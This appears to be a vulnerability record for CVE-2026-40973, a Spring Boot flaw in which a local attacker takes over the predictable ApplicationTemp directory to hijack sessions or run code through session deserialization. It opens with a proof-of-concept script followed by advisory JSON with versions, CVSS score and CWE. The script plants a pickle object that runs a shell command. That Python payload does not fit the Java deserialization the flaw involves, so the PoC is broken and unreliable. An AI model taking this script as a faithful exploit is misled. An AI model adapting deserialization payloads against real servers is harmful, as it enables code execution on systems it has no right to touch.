CVE-2026-40973

import os import pickle # Simulating the attacker creating a malicious session file # in the predictable ApplicationTemp directory. # Path prediction (simplified for PoC) temp_dir = "/tmp/spring-boot-session-dir" malicious_file = os.path.join(temp_dir, "session-123.ser") # Ensure directory exists (controlled by attacker) os.makedirs(temp_dir, exist_ok=True) # Malicious payload (Gadget chain placeholder) class MaliciousPayload: def __reduce__(self): # Simulate command execution return (os.system, ('touch /tmp/pwned',)) # Serialize the payload with open(malicious_file, 'wb') as f: pickle.dump(MaliciousPayload(), f) print(f"[+] Malicious session file created at {malicious_file}") print("[+] Waiting for application restart to trigger deserialization...")

{"cve": {"id": "CVE-2026-40973", "sourceIdentifier": "[email protected]", "published": "2026-04-28T00:16:24.357", "lastModified": "2026-04-30T14:25:36.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local attacker on the same host as the application may be able to take control of the directory used by `ApplicationTemp`. When `server.servlet.session.persistent` is set to `true` and the attack persists across application restarts, this may allow the attacker to read session information and hijack authenticated users or deploy a gadget chain and execute code as the application's user.\n\nAffected: Spring Boot 4.0.0–4.0.5 (fix 4.0.6), 3.5.0–3.5.13 (fix 3.5.14), 3.4.0–3.4.15 (fix 3.4.16), 3.3.0–3.3.18 (fix 3.3.19), 2.7.0–2.7.32 (fix 2.7.33); predictable temp directory / `ApplicationTemp` ownership verification. Versions that are no longer supported are also affected per vendor advisory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.33", "matchCriteriaId": "5B1C9BD7-7555-4B3D-AED9-60C3C13DCF46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.19", "matchCriteriaId": "28EE6470-24FD-49D1-A2F0-7A19B290A161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.16", "matchCriteriaId": "758A9E8F-0C52-43D9-8D84-69622B345A4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.14", "matchCriteriaId": "D23096A1-8269-46C5-9215-9098E87D0A24"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.6", "matchCriteriaId": "12A166C5-8B55-4BA3-AA8B-6024A257D441"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-40973", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}